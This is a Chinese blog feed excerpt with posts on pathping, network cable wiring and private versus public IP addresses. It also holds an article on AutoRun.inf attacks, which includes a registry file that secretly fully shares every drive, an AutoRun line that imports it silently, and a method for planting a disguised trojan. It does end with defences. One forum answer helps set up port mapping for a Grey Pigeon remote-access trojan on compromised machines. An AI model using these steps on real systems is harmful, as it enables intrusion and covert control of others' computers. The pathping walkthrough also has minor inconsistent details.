<p><font size="2">以下是典型的 pathping 报告。跃点列表后所编辑的统计信息表明在每个独立路由器 <br />上数据包丢失的情况。 </font></p>
<p><br /><font size="2">D:&gt;pathping -n msw </font></p>
<p><font size="2">Tracing route to msw [7.54.1.196] <br />over a maximum of 30 hops: <br />0 172.16.87.35 <br />1 172.16.87.218 <br />2 192.68.52.1 <br />3 192.68.80.1 <br />4 7.54.247.14 <br />5 7.54.1.196 </font></p>
<p><font size="2">Computing statistics for 125 seconds... <br />Source to Here This Node/Link <br />Hop RTT Lost/Sent = Pct Lost/Sent = Pct Address <br />0 172.16.87.35 <br />0/ 100 = 0% | <br />1 41ms 0/ 100 = 0% 0/ 100 = 0% 172.16.87.218 <br />13/ 100 = 13% | <br />2 22ms 16/ 100 = 16% 3/ 100 = 3% 192.68.52.1 <br />0/ 100 = 0% | <br />3 24ms 13/ 100 = 13% 0/ 100 = 0% 192.68.80.1 <br />0/ 100 = 0% | <br />4 21ms 14/ 100 = 14% 1/ 100 = 1% 10.54.247.14 <br />0/ 100 = 0% | <br />5 24ms 13/ 100 = 13% 0/ 100 = 0% 10.54.1.196 </font></p>
<p><font size="2">Trace complete. </font></p>
<p><font size="2">当运行 pathping 时，在测试问题时首先查看路由的结果。此路径与 tracert 命令所 <br />显示的路径相同。然后 pathping 命令对下一个 125 毫秒显示忙消息（此时间根据跃 <br />点计数变化）。在此期间，pathping 从以前列出的所有路由器和它们之间的链接之间 <br />收集信息。在此期间结束时，它显示测试结果。 </font></p>
<p><font size="2">最右边的两栏 This Node/Link Lost/Sent=Pct 和 Address 包含的信息最有用。172 <br />.16.87.218（跃点 1）和 192.68.52.1（跃点 2）丢失 13% 的数据包。 所有其他链 <br />接工作正常。在跃点 2 和 4 中的路由器也丢失寻址到它们的数据包（如 This Node <br />/Link 栏中所示），但是该丢失不会影响转发的路径。 </font></p>
<p><font size="2">对链接显示的丢失率（在最右边的栏中标记为 |）表明沿路径转发丢失的数据包。该 <br />丢失表明链接阻塞。对路由器显示的丢失率（通过最右边栏中的 IP 地址显示）表明 <br />这些路由器的 CPU 可能超负荷运行。这些阻塞的路由器可能也是端对端问题的一个因 <br />素，尤其是在软件路由器转发数据包时。<br /></font></p>]]></description>
		</item>
		    
		
		<item>
			<title>直连网线和交叉网线的制作与应用</title>
			<link>http://wlcol.blog.sohu.com/45489848.html</link>
			<comments>http://wlcol.blog.sohu.com/45489848.html#comment</comments>
			<dc:creator>ai你一生！</dc:creator>
			<pubDate>Tue, 5 Jun 2007 14:16:28 +0800</pubDate>
			<category>电脑、网络</category>
			<guid>http://wlcol.blog.sohu.com/45489848.html</guid>
			<description><![CDATA[<p>交叉线：一头是T-586A的标准另一头是T-568B的标准才可以两台计算机直接相连(网卡对网卡) <br /><br />普通的网线(直通线)两头一般都是T-568B标准的 <br /><br />所以:需要一根专门制作的网线,或者手头有空余的线改一下也可以只改一个头。做水晶头的时候，另一头要把 第1根和第3根对调，第2根和第6根对调 <br /><br />有关交叉线和直通线: <br /><br />568A的排线顺序从左到右依次为：绿白、绿、橙白、蓝、蓝白、橙、棕白、棕。 <br /><br />568B的排线顺序从左到右依次为：橙白、橙、绿白、蓝、蓝白、绿、棕白、棕。 <br /><br />交叉线是指：一端是568A标准，另一端是568B标准的双绞线。 <br />直通线则指：两端都是568A或都是568B标准的双绞线。 <br /><br />交叉线的顺序：<br />&nbsp;&nbsp;&nbsp;&nbsp; 一头（从左到右）：绿白、绿、橙白、蓝、蓝白、橙、棕白、棕。</p>
<p>另一头（从左到右）：橙白、橙、绿白、蓝、蓝白、绿、棕白、棕。 <br /><br />直通线的顺序：<br />两头一样(从左到右)：绿白、绿、橙白、蓝、蓝白、橙、棕白、棕<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 或者两头全是：橙白、橙、绿白、蓝、蓝白、绿、棕白、棕。 <br /><br />使用直通线的情况： <br />1. 将交换机或HUB与路由器连接； <br />2. 计算机（包括服务器和工作站）与交换机或HUB连接。 </p>
<p><br />使用交叉线的情况： <br />1． 交换机与交换机之间通过UPLINKS口连接； <br />2． HUB与交换机连接； <br />3． HUB与HUB之间连接； <br /><strong>4． 两台PC直接相连(网卡对网卡)；</strong> <br />5． 路由器接口与其它路由器接口的连接； <br />6． Ethernet接口的ADSL Modem连接到PC机的网卡接口。 <br /><br />简单点就是说，<strong>同一层设备相连用交叉线，不同一层设备相连用直连线。</strong> <br />或者说，<strong>如果两个端口的类型相同，就使用交叉线；如果两个端口类型不同，则使用直连线。 <br /></strong><br />至于两台计算机直接相连后的设置: <br /><br />用正确的网线连好以后,自动获取IP也可以,配置一下家庭网络向导 <br /><br />或者把两台机器的IP分别设置成:192.168.0.1和192.168.0.2(类似即可) 就可以传数据了。</p>
<p><u><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</strong></u></p>
<p><strong><font size="4">★ 如果是双机直联，必须使用交叉网线（实际上就是1236四根线交叉），实际上电信ADSL所提供的那根网线就是这种网线，其两头的排列方式分别为：<br />　　1 2 3 4 5 6 7 8<br />　　3 6 1 4 5 2 7 8 <br />　　如果是使用简易网线测量仪，其灯跳顺序应为：12&rarr;45&rarr;78&rarr;36&rarr;12，下面更详细的再说一遍：<br />　　一端： 白橙／橙／白绿／蓝／白蓝／绿／白棕／棕（12345678） 1 2 3 4 5 6 7 8<br />　　一端： 白绿／绿／白橙／蓝／白蓝／橙／白棕／棕（36145278） 3 6 1 4 5 2 7 8<br />　　你也可以把4578四根线也交叉，即：<br />　　1 2 3 4 5 6 7 8<br />　　3 6 1 7 8 2 4 5</font></strong></p>]]></description>
		</item>
		    
		
		<item>
			<title>何为内网?何为外网?</title>
			<link>http://wlcol.blog.sohu.com/43174215.html</link>
			<comments>http://wlcol.blog.sohu.com/43174215.html#comment</comments>
			<dc:creator>ai你一生！</dc:creator>
			<pubDate>Mon, 23 Apr 2007 10:30:57 +0800</pubDate>
			<category>电脑、网络</category>
			<guid>http://wlcol.blog.sohu.com/43174215.html</guid>
			<description><![CDATA[<div style="FONT-SIZE: 11px"><font size="2">今天在黑基的论坛看到一个这样的帖子,问如何分辨出自己是在内网还是在外网?<br />我回帖解答了一下.也随便发了这个帖子.希望新人们看看.<br /><br />这是他的原帖:<br /></font><font size="2"><font color="#ff6600">1楼:<br />发表于 2007-4-21 07:13&nbsp;&nbsp;&nbsp;&nbsp;<br />再次提问几个菜鸟问题<br /><br />不要让我去看谁谁谁的帖子<br />或许你们高手不觉得<br />但是你们写的的确很难让新 人明白<br />可能是我太苯了哈~~<br />第一个是:怎么判断一个电脑是外网还是内网?&nbsp;&nbsp;查自己ip 有2个网络地址 一个是本地连接 一个是宽带连接 网关的地址跟宽带连接的ip一样<br />那我是内网还是外网?<br />第二个是:我在家 或者网吧 攻破不了路由器(压根就点不开页面) 所以采用9999端口映射&nbsp;&nbsp;说必须找外网的肉鸡进行映射 昨天给我弟弟<br />发了灰鸽子自己带的开映射的程序 映射成功(是全成功) 但是鸽子还是不上线&nbsp; &nbsp;<br />昨天问映射端口是不是不能和鸽子上线端口一样&nbsp;&nbsp;有人说我傻```我就纳闷了 逐渐天黑的课程里说了 因为他肉鸡上线断口是8000 所以映射断口<br />设置成了8888 那又是什么道理?<br />第三个是我把配置好的鸽子上传到空间了&nbsp; &nbsp;自己下载运行后的确上线&nbsp;&nbsp;然后通过3389肉鸡&nbsp;&nbsp;从网上下载到他的机器上运行了之后 我这边却不上线<br />是不是因为我是内网的?&nbsp;&nbsp;他的防火杀毒都已经被我关了 安装成功&nbsp;&nbsp;<br />谁能解释一下~~~~谢谢大家了~</font><br /></font></div>
<div style="FONT-SIZE: 11px"><br /><font size="2">2楼:<br /><br />发表于 2007-4-21 09:10&nbsp;&nbsp;<br /></font><a href="http://bbs.hackbase.com/attachment.php?aid=2443" target="_blank"><font size="2">http://bbs.hackbase.com/attachment.php?aid=2443</font></a><font size="2"> <br /><br /><br /><br /><br />3楼:也就是我的回帖<br /><br /><br />我本人在这里只能回答你第一 二个问题.<br />2楼给的工具我也看到了,它只适合那些小菜,如果你连最基本的网络知识特别是IP问题都不明白的话,<br />我劝你还是好好看看这方面的书籍,不知道网络连通的原理,你还怎么去玩,去玩端口映射,你知道那是什么原理么?<br />说的多了,下面我就跟你说说何为内网何为外网.<br />要想分变出你是处于什么网络,使用一条命令,简单判断一下就可以知道了,如下这是我的IP信息情况.<br />根据我自己的情况向你解释一下.我用的是XDSL上的网.<br />C:\&gt;ipconfig&nbsp; &nbsp;&nbsp;&nbsp;<br /><br />Windows IP Configuration<br /><br /><br />Ethernet adapter 本地连接:&nbsp; &nbsp;&nbsp; &nbsp;&quot;本地连接,打开你的网络连接窗口,会发现有一个名为本地连接的图标&quot;<br /><br />&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;Connection-specific DNS Suffix&nbsp;&nbsp;. :<br />&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;IP Address. . . . . . . . . . . . : 192.168.1.5&nbsp; &nbsp;&nbsp; &nbsp; &quot;我的本地IP地址,所有192.168.0.0/16在这范围内的IP为INTERNET私有地址,不被INTERNET主机识别,不被路由器转发报文.所以我是处于内网,也可以这么说只要发现你的本地连接地址为192.168.0.0/16(192.168.0.1-192.168.255.255)内的地址,你就是处于内网.&quot;<br />&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;Subnet Mask . . . . . . . . . . . : 255.255.255.0&nbsp; &nbsp;&quot;子网掩码.识别你IP所处于的网段,这是C类地址的默认子网掩码,现在最多使用的技术是CIDR,又为无类别域间路由.也就是不为IP分类,使用这种技术更好的节约了可用IP日趋减少的问题,还有就是NAT技术,你可以查看一下资料,来了解一下这些技术.会对你有帮助的.&quot;<br />&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;Default Gateway . . . . . . . . . : 192.168.1.1&nbsp;&nbsp;&quot;本地网关.这里就是我自己宽带猫上的ENTERNET接口IP,这个宽带的猫就是一个小小的路由器,它所起到的作用就是地址转换和在线路上使用PPPOE技术,地址转换就是NAT技术,将你本地私有网络地址转换成网络主机能识别的公网IP,也就能被路由器转发数据包了,在说PPPOEPPPoE,以太网上的点对点协议,是将点对点协议（PPP）封装在以太网(Ethernet)框架中的一种网络协议 ,应该知道以太网发送的是数据桢，属于OSI七层模型里的第二层,而XDSL使用的电话线路,对端都是程控交换机,所以就出现了这个技术PPPOE,既能够在这个电话网上使用 验证,授权,计费 所谓的AAA技术.&quot;<br /><br />在说一下网络通信,计算机通信它只能和在本网段的主机通信,既为子网掩码所标志的网段,计算机首先判断你通信的IP是否和自己是在一个网段,子网掩码和IP地址相与,如果在一个网段,就会发出一个ARP(地址解析协议)广播报文,对方就会回送一个报文,告诉计算机自己的MAC地址,(计算机通信它并不是通过IP地址通信的,而是通过数据链路层MAC地址通信,MAC地址全球唯一,也就是网卡芯片上所固有的地址,如果你女朋友向你要一个全世界唯一的东西,你不仿送她个网卡,一定全球唯一.哈哈. <br />如果判断出不在一个网段,计算机就会解析出网关的MAC地址,把数据发送到网关,网关会把数据转送出去,所以这才是网关的重要性,一般情况下所说的网关就是路由器的ENTERNET接口.<br /><br />PPP adapter ADSL:&nbsp; &nbsp;&nbsp;&nbsp;&quot;ADSL连接&quot;<br /><br />&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;Connection-specific DNS Suffix&nbsp;&nbsp;. :<br />&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;IP Address. . . . . . . . . . . . : 222.163.139.100&nbsp; &nbsp;&nbsp;&nbsp;&quot;这就是外网的IP.也就是我的ISP为我提供的一个外网IP.当然这是要花钱的.有了它你才能正常的上网.&quot;<br />&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;Subnet Mask . . . . . . . . . . . : 255.255.255.255&nbsp; &nbsp; &quot;一样也是子网掩码,但是它标记的是一个IP,也就是我自己的IP,上面的255.255.255.0 能标记出254台主机,既254台可用IP且在一个网段.除去0和255.一个是网段标识,一个全网广播地址.&quot;<br />&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;Default Gateway . . . . . . . . . : 222.163.139.100&nbsp; &nbsp;&quot;以自己的IP地址为网关&quot;<br /><br />你要是在网吧上的网,你只能看到第一个本地连接的属性.因为网吧都是有固定的IP,通过交换机将整个LAN连接在一起,在连接到ROUER上,做一下NAT就可以整个LAN一起上网了<br />端口映射就是将ROUTER上的一个端口映射成你本机私有地址的一个端口,相当于你有了一个外网IP,<br />如&nbsp; &nbsp;222.222.222.222 :8000 -192.168.1.5:8888&nbsp; &nbsp;<br />就是说将外网IP的8000端口映射成你自己机器的 8888端口.所有发送到222.222.222.222 8000端口的数据将会发送到你机器的8888端口,所以你得将灰鸽子上线设置成8888端口.<br /></font></div><a href="http://bbs.hackbase.com/viewthread.php?tid=3112620" target="_blank">
<div style="FONT-SIZE: 11px"><br /><font size="2">说了很多,不清楚你明白了没有,我也只是在网络原理这方面有点了解,别的方面帮不了你什么忙.很多时候还是要自己学习,理解的.多多看书.这是我的建议.</font></div>
<div style="FONT-SIZE: 11px"><font size="2"></font>&nbsp;</div>
<div style="FONT-SIZE: 11px"><font size="2"></font>&nbsp;</div>
<div style="FONT-SIZE: 11px"><font size="2">黑基原帖:</font><a href="http://bbs.hackbase.com/viewthread.php?tid=3112620" target="_blank"><font size="2">http://bbs.hackbase.com/viewthread.php?tid=3112620</font></a></div></a>]]></description>
		</item>
		    
		
		<item>
			<title>英雄</title>
			<link>http://wlcol.blog.sohu.com/42282081.html</link>
			<comments>http://wlcol.blog.sohu.com/42282081.html#comment</comments>
			<dc:creator>ai你一生！</dc:creator>
			<pubDate>Mon, 16 Apr 2007 18:52:00 +0800</pubDate>
			<category>随笔</category>
			<guid>http://wlcol.blog.sohu.com/42282081.html</guid>
			<description><![CDATA[<p><font face="楷体_GB2312" color="#009900" size="4">剑煮酒无味<br />饮一杯为谁<br />你为我送别你为我送别<br />胭脂香味能爱不能给<br />天有多长地有多远<br />你是英雄就注定无泪无悔<br />这笑有多危险是穿肠毒药<br />这泪有多么美只有你知道<br />这心没有你活这可笑<br />这一世英名我不要<br />只求换来红颜一笑<br />这一去如果还能轮回<br />我愿意来生作牛马<br />也要与你天涯相随<br />.............<br /></font></p>]]></description>
		</item>
		    
		
		<item>
			<title>黑客技术分析来自Autorun的攻击</title>
			<link>http://wlcol.blog.sohu.com/31706535.html</link>
			<comments>http://wlcol.blog.sohu.com/31706535.html#comment</comments>
			<dc:creator>ai你一生！</dc:creator>
			<pubDate>Mon, 29 Jan 2007 09:52:02 +0800</pubDate>
			<guid>http://wlcol.blog.sohu.com/31706535.html</guid>
			<description><![CDATA[<a name="part">&nbsp; 最近网上流行通过AutoRun.inf文件使对方所有的硬盘完全共享或中木马的方法，由于AutoRun.inf文件在黑客技术中的应用还是很少见的，相应的资料也不多，有很多人对此觉得很神秘，本文试图为您解开这个迷，使您能完全的了解这个并不复杂却极其有趣的技术。 
</a><p><a name="part"><strong>一、理论基础</strong> 
</a></p><p><a name="part">经常使用光盘的朋友都知道，有很多光盘放入光驱就会自动运行，它们是怎么做的呢？光盘一放入光驱就会自动被执行，主要依靠两个文件，一是光盘上的AutoRun.inf文件，另一个是操作系统本身的系统文件之一的Cdvsd.vxd。Cdvsd.vxd会随时侦测光驱中是否有放入光盘的动作，如果有的话，便开始寻找光盘根目录下的AutoRun.inf文件。如果存在AutoRun.inf文件则执行它里面的预设程序。 
</a></p><p><a name="part">AutoRun.inf不光能让光盘自动运行程序，也能让硬盘自动运行程序，方法很简单，先打开记事本，然后用鼠标右键点击该文件，在弹出菜单中选择&ldquo;重命名&rdquo;，将其改名为AutoRun.inf，在AutoRun.inf中键入以下内容： 
</a></p><p><a name="part">
</a><center><a name="part"></a><a name="part">
<table cellspacing="0" cellpadding="2" align="center" border="1">
<tbody>
<tr>
<td style="FONT-SIZE: 9pt" bgcolor="#e6e6e6"><pre>[AutoRun]　　　　//表示AutoRun部分开始，必须输入

Icon=C:\C.ico　　//给C盘一个个性化的盘符图标C.ico

Open=C:\1.exe　　//指定要运行程序的路径和名称，在此为C盘下的1.exe</pre></td></tr></tbody></table></a></center>
</p><p>保存该文件，按F5刷新桌面，再看&ldquo;我的电脑&rdquo;中的该盘符(在此为C盘)，你会发现它的磁盘图标变了，双击进入C盘，还会自动播放C盘下的1.exe文件！ 
</p><p>解释一下：&ldquo;[AutoRun]&rdquo;行是必须的固定格式，&ldquo;Icon&rdquo;行对应的是图标文件，&ldquo;C:\C.ico&rdquo;为图标文件路径和文件名，你在输入时可以将它改为你的图片文件所在路径和文件名。另外，&ldquo;.ico&rdquo;为图标文件的扩展名，如果你手头上没有这类文件，可以用看图软件ACDSee将其他格式的软件转换为ico格式，或者找到一个后缀名为BMP的文件，将它直接改名为ICO文件即可。 
</p><p>&ldquo;Open&rdquo;行指定要自动运行的文件及其盘符和路径。要特别说明的是，如果你要改变的硬盘跟目录下没有自动播放文件，就应该把&ldquo;OPEN&rdquo;行删掉，否则就会因为找不到自动播放文件而打不开硬盘，此时只能用鼠标右键单击盘符在弹出菜单中选&ldquo;打开&rdquo;才行。 
</p><p>请大家注意：保存的文件名必须是&ldquo;AutoRun.inf&rdquo;，编制好的Autorun.inf文件和图标文件一定要放在硬盘根目录下。更进一步，如果你的某个硬盘内容暂时比较固定的话，不妨用Flash做一个自动播放文件，再编上&ldquo;Autorun&rdquo;文件，那你就有最酷、最个性的硬盘了。 
</p><p>到这儿还没有完。大家知道，在一些光盘放入后，我们在其图标上单击鼠标右键，还会产生一个具有特色的目录菜单，如果能对着我们的硬盘点击鼠标右键也产生这样的效果，那将更加的有特色。其实，光盘能有这样的效果也仅仅是因为在AutoRun.inf文件中有如下两条语句： 
</p><p>
<center>
<table cellspacing="0" cellpadding="2" align="center" border="1">
<tbody>
<tr>
<td style="FONT-SIZE: 9pt" bgcolor="#e6e6e6"><pre>shell\标志＝显示的鼠标右键菜单中内容

shell\标志\command＝要执行的文件或命令行</pre></td></tr></tbody></table></center>
</p><p>所以，要让硬盘具有特色的目录菜单，在AutoRun.inf文件中加入上述语句即可，示例如下： 
</p><p>
<center>
<table cellspacing="0" cellpadding="2" align="center" border="1">
<tbody>
<tr>
<td style="FONT-SIZE: 9pt" bgcolor="#e6e6e6"><pre>shell\1=天若有情天亦老

shell\1\command\=notepad ok.txt</pre></td></tr></tbody></table></center>
</p><p>保存完毕，按F5键刷新，然后用鼠标右键单击硬盘图标，在弹出菜单中会发现&ldquo;天若有情天亦老&rdquo;，点击它，会自动打开硬盘中的&ldquo;ok.txt&rdquo;文件。注意：上面示例假设&ldquo;ok.txt&rdquo;文件在硬盘根目录下，notepad为系统自带的记事本程序。如果要执行的文件为直接可执行程序，则在&ldquo;command\&rdquo;后直接添加该执行程序文件名即可。</p>
<p><a name="part">&nbsp; </a></p>
<p><strong>二、实例</strong> 
</p><p>下面就举个例子：如果你扫到一台开着139共享的机器，而对方只完全共享了D盘，我们要让对方的所有驱动器都共享。首先编辑一个注册表文件，打开记事本，键入以下内容： 
</p><p>
<center>
<table cellspacing="0" cellpadding="2" align="center" border="1">
<tbody>
<tr>
<td style="FONT-SIZE: 9pt" bgcolor="#e6e6e6"><pre>REGEDIT4
'此处一定要空一行
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C$]
&quot;Path&quot;=&quot;C:&quot;
&quot;Remark&quot;=&quot;&quot;
&quot;Type&quot;=dword:00000000
&quot;Flags&quot;=dword:00000302
&quot;Parmlenc&quot;=hex:
&quot;Parm2enc&quot;=hex:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\D$]
&quot;Path&quot;=&quot;D:&quot;
&quot;Remark&quot;=&quot;&quot;
&quot;Type&quot;=dword:00000000
&quot;Flags&quot;=dword:00000302
&quot;Parmlenc&quot;=hex:
&quot;Parm2enc&quot;=hex:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C$]
&quot;Path&quot;=&quot;E:&quot;
&quot;Remark&quot;=&quot;&quot;
&quot;Type&quot;=dword:00000000
&quot;Flags&quot;=dword:00000302
&quot;Parmlenc&quot;=hex:
&quot;Parm2enc&quot;=hex:</pre></td></tr></tbody></table></center>
</p><p>以上我只设置到E盘，如果对方有很多逻辑盘符的请自行设置。将以上部分另存为Share.reg文件备用。要特别注意REGEDIT4为大写且顶格书写，其后要空上一行，在最后一行记得要按一次回车键。 
</p><p>然后打开记事本，编制一个AutoRun.inf文件，键入以下内容： 
</p><p>
<center>
<table cellspacing="0" cellpadding="2" align="center" border="1">
<tbody>
<tr>
<td style="FONT-SIZE: 9pt" bgcolor="#e6e6e6"><pre>[AutoRun]
Open=regedit/s Share.reg   //加/s参数是为了导入时不会显示任何信息</pre></td></tr></tbody></table></center>
</p><p>保存AutoRun.inf文件。将Share.reg和AutoRun.inf这两个文件都复制到对方的D盘的根目录下，这样对方只要双击D盘就会将Share.reg导入注册表，这样对方电脑重启后所有驱动器就会都完全共享出来。 
</p><p>如果想让对方中木马，只要在AutoRun.inf文件中，把&ldquo;Open=Share.Reg&rdquo;改成&ldquo;Open=木马服务端文件名&rdquo;，然后把AutoRun.inf和配置好的木马服务端一起复制到对方D盘的根目录下，这样不需对方运行木马服务端程序，而只需他双击D盘就会使木马运行！这样做的好处显而易见，那就是大大的增加了木马运行的主动性！须知许多人现在都是非常警惕的，不熟悉的文件他们轻易的不会运行，而这种方法就很难防范了。 
</p><p>要说明的是，给你下木马的人不会那么蠢的不给木马加以伪装，一般说来，他们会给木马服务端文件改个名字，或好听或和系统文件名很相像，然后给木马换个图标，使它看起来像TXT文件、ZIP文件或图片文件等，，最后修改木马的资源文件使其不被杀毒软件识别（具体的方法可以看本刊以前的文章），当服务端用户信以为真时，木马却悄悄侵入了系统。其实，换个角度理解就不难了&mdash;&mdash;要是您给别人下木马我想你也会这样做的。以上手段再辅以如上内容的AutoRun.inf文件就天衣无缝了！</p>
<p><a name="part">&nbsp; </a></p>
<p><strong>三、防范方法</strong> 
</p><p>共享分类完全是由flags标志决定的，它的键值决定了共享目录的类型。当flags=0x302时，重新启动系统，目录共享标志消失，表面上看没有共享，实际上该目录正处于完全共享状态。网上流行的共享蠕虫，就是利用了此特性。如果把&quot;Flags&quot;=dword:00000302改成&quot;Flags&quot;=dword:00000402，就可以看到硬盘被共享了，明白了吗？秘密就在这里！ 
</p><p>以上代码中的Parmlenc、Parm2enc属性项是加密的密码，系统在加密时采用了8位密码分别与&ldquo;35 9a 4b a6 53 a9 d4 6a&rdquo;进行异或运算，要想求出密码再进行一次异或运算，然后查ASCII表可得出目录密码。在网络软件中有一款软件就利用该属性进行网络密码破解的，在局域网内从一台机器上可以看到另一台计算机的共享密码。 
</p><p>利用TCP/IP协议设计的NethackerⅡ软件可以穿过Internet网络，找到共享的主机，然后进行相应操作。所以当您通过Modem上网时，千万要小心，因为一不小心，您的主机将完全共享给对方了。 
</p><p>解决办法是把 
</p><p>
<center>
<table cellspacing="0" cellpadding="2" align="center" border="1">
<tbody>
<tr>
<td style="FONT-SIZE: 9pt" bgcolor="#e6e6e6"><pre>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan</pre></td></tr></tbody></table></center>
</p><p><br />下面的&ldquo;C$&rdquo;、&ldquo;D$&rdquo;、&ldquo;E$&rdquo;等删掉。然后删除windows\system\下面的Vserver.vxd删除，它是Microsoft网络上的文件与打印机共享虚拟设备驱动程序，再把 </p>
<p>
<center>
<table cellspacing="0" cellpadding="2" align="center" border="1">
<tbody>
<tr>
<td style="FONT-SIZE: 9pt" bgcolor="#e6e6e6"><pre>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\</pre></td></tr></tbody></table></center>
</p><p><br />下的Vserver键值删掉，就会很安全了。 </p>
<p>另外，关闭硬盘AutoRun功能也是防范黑客入侵的有效方法之一。具体方法是在&ldquo;开始&rdquo;菜单的&ldquo;运行&rdquo;中输入Regedit，打开注册表编辑器，展开到 
</p><p>
<center>
<table cellspacing="0" cellpadding="2" align="center" border="1">
<tbody>
<tr>
<td style="FONT-SIZE: 9pt" bgcolor="#e6e6e6"><pre>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Exploer</pre></td></tr></tbody></table></center>
</p><p><br />主键下，在右侧窗格中找到&ldquo;NoDriveTypeAutoRun&rdquo;，就是这个键决定了是否执行CDROM或硬盘的AutoRun功能。 </p>
<p>双击&ldquo;NoDriveTypeAutoRun&rdquo;，在默认状态下（即你没有禁止过AutoRun功能），在弹出窗口中可以看到&ldquo;NoDriveTypeAutoRun&rdquo;默认键值为95,00,00,00。其中第一个值&ldquo;95&rdquo;是十六进制值，它是所有被禁止自动运行设备的和。将&ldquo;95&rdquo;转为二进制就是10010101，其中每位代表一个设备，Windows中不同设备会用如下数值表示： 
</p><p>
<center>
<table cellspacing="0" cellpadding="2" align="center" border="1">
<tbody>
<tr>
<td style="FONT-SIZE: 9pt" bgcolor="#e6e6e6"><pre>设备名称　　　　 第几位 值 设备用如下数值表示  设备名称含义
DKIVE_UNKNOWN　　  0　　1　　01h　　　　　　   不能识别的设备类型
DRIVE_NO_ROOT_DIR  1　　0　　02h　　　　　　   没有根目录的驱动器(Drive without root 　
　　　　　　　　　　　　　　　　　　　　　　　 directory) 
DRIVE_REMOVABLE　　2　　1　　04h　　　　　　   可移 动驱动器(Removable drive)
DRIVE_FIXED　　　　3　　0　　08h　　　　　　   固定的驱动器(Fixed drive)  
DRIVE_REMOTE　　   4　　1　　10h　　　　　　   网络驱动器(Network drive)
DRIVE_CDROM　　　　5　　0　　20h　　　　　　   光驱(CD-ROM)　　
DRIVE_RAMDISK　　  6　　0　　40h　　　　　　   RAM磁盘(RAM Disk) 
保留　　　　　　   7　　1　　80h　　　　　　   未指定的驱动器类型(Not yet 
                                               specified drive disk)</pre></td></tr></tbody></table></center>
</p><p>在上面所列的表中值为&ldquo;0&rdquo;表示设备运行，值为&ldquo;1&rdquo;表示该设备不运行（默认情况下，Windows禁止80h、10h、4h、01h这些设备自动运行，这些数值累加正好是十六进制的95h，所以NoDriveTypeAutoRun&rdquo;默认键值为95,00,00,00）。</p>
<p><a name="part">&nbsp; </a></p>
<p>由上面的分析不难看出，在默认情况下，会自动运行的设备是DRIVE_NO_ROOT_DIR、DRIVE_FIXED、DRIVE_CDROM、DRIVE_RAMDISK这四个保留设备，所以要禁止硬盘自动运行AutoRun.inf文件，就必须将DRIVE_FIXED的值设为1，这是因为DRIVE_FIXED代表固定的驱动器，即硬盘。这样一来，原来的10010101（在表中&ldquo;值&rdquo;列中由下向上看）就变成了二进制的10011101，转为十六进制为9D。现在，将&ldquo;NoDriveTypeAutoRun&rdquo;的键值改为9D,00,00,00后关闭注册表编辑器，重启电脑后就会关闭硬盘的AutoRun功能。 
</p><p>如果你看明白了，那你肯定知道该怎样禁止光盘AutoRun功能了，对！就是将DRIVE_CDROM设为1，这样&ldquo;NoDriveTypeAutoRun&rdquo;键值中的第一个值就变成了10110101，也就是十六进制的B5。将第一个值改为B5后关闭注册表编辑器，重启电脑后就会关闭CDROM的Autorun功能。如果仅想禁止软件光盘的AutoRun功能，但又保留对CD音频碟的自动播放能力，这时只需将&ldquo;NoDriveTypeAutoRun&rdquo;的键值改为：BD,00,00,00即可。 
</p><p>如果想要恢复硬盘或光驱的AutoRun功能，进行反方向操作即可。 
</p><p>事实上，大多数的硬盘根目录下并不需要AutoRun.inf文件来运行程序，因此我们完全可以将硬盘的AutoRun功能关闭，这样即使在硬盘根目录下有AutoRun.inf这个文件，Windows也不会去运行其中指定的程序，从而可以达到防止黑客利用AutoRun.inf文件入侵的目的。 
